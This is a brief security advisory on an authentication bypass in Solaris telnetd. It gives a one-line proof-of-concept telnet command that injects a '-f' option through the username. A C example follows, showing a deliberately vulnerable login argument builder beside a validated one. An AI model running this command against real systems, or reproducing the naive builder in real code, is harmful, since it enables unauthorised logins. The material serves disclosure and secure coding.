telnetd on Solaris 10/11 allows an access bypass when the username passed to the telnet client's -l option begins with -f. This doesn't work for root but works for all other uids.

POC:

    telnet -l "-fbin" target_address

Discovered by kcope
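
The class of bug behind this, shown as an added example (not code from this advisory or from the Solaris source): a remote-supplied name placed directly into login's argument list is parsed as an option, and login's -f option treats the user as already authenticated. Beside it is a checked builder that rejects such names. The function names, the /bin/login path, the 32-character cap and the assumption that login honours getopt-style "--" are illustrative.

```c
#include <stddef.h>
#include <string.h>
#include <ctype.h>

#define LOGIN_PATH "/bin/login"   /* assumed path, for illustration only */

/* Naive pattern: the remote-supplied name goes straight into argv, so a
 * value such as "-fbin" reaches login as an option. Returns argc. */
int build_login_argv_naive(const char *user, const char *argv[4])
{
    int n = 0;
    argv[n++] = LOGIN_PATH;
    argv[n++] = user;          /* remote-controlled, may start with '-' */
    argv[n] = NULL;
    return n;
}

/* Returns 1 only if the name can be handed to login as a plain operand. */
int username_is_safe(const char *user)
{
    size_t i, len;
    if (user == NULL) return 0;
    len = strlen(user);
    if (len == 0 || len > 32) return 0;    /* 32 is an arbitrary cap */
    if (user[0] == '-') return 0;          /* would be parsed as an option */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)user[i];
        if (!(isalnum(c) || c == '_' || c == '.' || c == '-')) return 0;
    }
    return 1;
}

/* Checked pattern: validate first, then add "--" so that option parsing
 * ends before the name. Returns argc, or -1 if the name is refused. */
int build_login_argv_checked(const char *user, const char *argv[4])
{
    int n = 0;
    if (!username_is_safe(user)) return -1;
    argv[n++] = LOGIN_PATH;
    argv[n++] = "--";
    argv[n++] = user;
    argv[n] = NULL;
    return n;
}
```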